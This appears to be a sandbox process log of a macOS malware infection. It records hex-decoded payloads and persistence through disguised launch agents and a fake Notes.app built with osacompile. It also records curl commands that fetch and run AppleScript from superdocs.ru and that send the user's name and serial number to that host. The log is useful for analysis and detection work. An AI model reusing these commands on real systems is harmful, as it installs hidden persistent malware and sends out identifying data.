File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/xxd
Arguments:	xxd -p -r
File size:	167712 bytes
MD5 hash:	aaca2dc9ef1cdee4042195108a1e9588

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/xxd
Arguments:	xxd -p -r
File size:	167712 bytes
MD5 hash:	aaca2dc9ef1cdee4042195108a1e9588

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/xxd
Arguments:	xxd -p -r
File size:	167712 bytes
MD5 hash:	aaca2dc9ef1cdee4042195108a1e9588

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/defaults
Arguments:	defaults read loginwindow SystemVersionStampAsString
File size:	205376 bytes
MD5 hash:	4e146d0cf6ed8b4592347198fc2a990c

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl --connect-timeout 11 -s -k https://melindas.ru
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl -ks -m 5 -H X-Usr: pedro https://melindas.ru/sys/prepod.php
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Notes.app
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Containers
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Notes.app
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Containers
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Containers
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Notes.app
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Containers
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /test.tmp
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/mkdir
Arguments:	mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail
File size:	134128 bytes
MD5 hash:	1a411936bac2c64c06674cbcfcdd66f8

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/osacompile
Arguments:	osacompile -x -e trydo shell script 'osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt''end try -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app
File size:	190176 bytes
MD5 hash:	84bbdc98ac7aa38fcbb281f019bb391d

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/codesign
Arguments:	n/a
File size:	374000 bytes
MD5 hash:	333e942b520d108598e02aa116a47fba

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /test2.tmp
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /test3.tmp
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/plutil
Arguments:	plutil -replace LSUIElement -bool YES /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist
File size:	270832 bytes
MD5 hash:	11427a2425049a93a60e85d61c9c0081

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -f /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/cp
Arguments:	cp -f /System/Applications/Notes.app/Contents/Resources/AppIcon.icns /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
File size:	152672 bytes
MD5 hash:	c6968d65936952ad8b175271cbbc8708

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/dirname
Arguments:	dirname /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
File size:	150192 bytes
MD5 hash:	206cca615592f99874d8cb4cd1641f07

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/mkdir
Arguments:	mkdir -p /Users/pedro/Library/LaunchAgents
File size:	134128 bytes
MD5 hash:	1a411936bac2c64c06674cbcfcdd66f8

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/dirname
Arguments:	dirname /Users/pedro/Library/Caches/GitServices/AppleWebKit
File size:	150192 bytes
MD5 hash:	206cca615592f99874d8cb4cd1641f07

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/mkdir
Arguments:	mkdir -p /Users/pedro/Library/Caches/GitServices
File size:	134128 bytes
MD5 hash:	1a411936bac2c64c06674cbcfcdd66f8

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/cat
Arguments:	cat
File size:	151792 bytes
MD5 hash:	c5d124a467bf29f668fd9bac3a9856ab

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/chmod
Arguments:	chmod +x /Users/pedro/Library/Caches/GitServices/AppleWebKit
File size:	136960 bytes
MD5 hash:	8339fe4afa333001c03a7b21f7ad0e9c

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/cat
Arguments:	cat
File size:	151792 bytes
MD5 hash:	c5d124a467bf29f668fd9bac3a9856ab

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/launchctl
Arguments:	launchctl unload -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
File size:	360752 bytes
MD5 hash:	240cdf175cab143785114a58688a4d0a

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /test4.tmp
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:40
Start date:	24/08/2022
Path:	/bin/launchctl
Arguments:	launchctl load -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist
File size:	360752 bytes
MD5 hash:	240cdf175cab143785114a58688a4d0a

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:41
Start date:	24/08/2022
Path:	/usr/bin/dirname
Arguments:	dirname /Users/pedro/Library/Caches/GitServices/.report
File size:	150192 bytes
MD5 hash:	206cca615592f99874d8cb4cd1641f07

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:41
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /test5.tmp
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:41
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /test6.tmp
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:41
Start date:	24/08/2022
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	210240 bytes
MD5 hash:	75c2cf3350c6882f23b4a275a9f9f4cb

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	bash /Users/pedro/Library/Caches/GitServices/AppleWebKit
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:41
Start date:	24/08/2022
Path:	/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet
Arguments:	/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet
File size:	134016 bytes
MD5 hash:	1535756d106d32fe31c1959e19e6582d

Start time:	11:18:41
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/usr/bin/osascript
Arguments:	osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt
File size:	208544 bytes
MD5 hash:	d86dbe94a4b95a8d18c37e43b7d6b6a4

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ping -o -t 3 superdocs.ru
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/sbin/ping
Arguments:	ping -o -t 3 superdocs.ru
File size:	202944 bytes
MD5 hash:	e7f06272a612949c2e552aa2556fb798

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/rm
Arguments:	rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers
File size:	135424 bytes
MD5 hash:	dc9f95c6c7dbdd1609aa6716ba393cd3

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/mkdir
Arguments:	mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers
File size:	134128 bytes
MD5 hash:	1a411936bac2c64c06674cbcfcdd66f8

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c whoami
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/usr/bin/whoami
Arguments:	whoami
File size:	151184 bytes
MD5 hash:	3c1b6e2e567df857130cd73ff38d3df7

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl -sk -d user=pedro&build_vendor=default&build_version=1.1.5 https://superdocs.ru/apple/com.php
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Start time:	11:18:42
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:42
Start date:	24/08/2022
Path:	/usr/bin/osacompile
Arguments:	osacompile -x -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
File size:	190176 bytes
MD5 hash:	84bbdc98ac7aa38fcbb281f019bb391d

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/usr/bin/osascript
Arguments:	osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
File size:	208544 bytes
MD5 hash:	d86dbe94a4b95a8d18c37e43b7d6b6a4

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c whoami
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/usr/bin/whoami
Arguments:	whoami
File size:	151184 bytes
MD5 hash:	3c1b6e2e567df857130cd73ff38d3df7

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ping -o -t 3 superdocs.ru
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/sbin/ping
Arguments:	ping -o -t 3 superdocs.ru
File size:	202944 bytes
MD5 hash:	e7f06272a612949c2e552aa2556fb798

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/usr/sbin/ioreg
Arguments:	ioreg -c IOPlatformExpertDevice -d 2
File size:	189696 bytes
MD5 hash:	d03e2df1848ceb731ba4a8c3e82b2011

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/usr/bin/awk
Arguments:	awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
File size:	334944 bytes
MD5 hash:	231a9b1c4634f8b7b53d29c9c47ee4df

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/usr/bin/curl
Arguments:	curl -k -s --connect-timeout 14 -d module launched. connRetries: 0. Used domain: superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
File size:	519040 bytes
MD5 hash:	f26856a56418cdf4551b4bdd7be78831

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/sh
Arguments:	n/a
File size:	150384 bytes
MD5 hash:	047b5ec8689a426fcee2b1ab7ac7b264

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:43
Start date:	24/08/2022
Path:	/bin/mkdir
Arguments:	mkdir -p /Users/pedro/Library/Caches/GitServices/
File size:	134128 bytes
MD5 hash:	1a411936bac2c64c06674cbcfcdd66f8

Start time:	11:18:45
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:45
Start date:	24/08/2022
Path:	/usr/bin/touch
Arguments:	touch /Users/pedro/Library/Caches/GitServices/.ed
File size:	134496 bytes
MD5 hash:	63d1087742d412edbc4f41c9e90067d2

Start time:	11:18:55
Start date:	24/08/2022
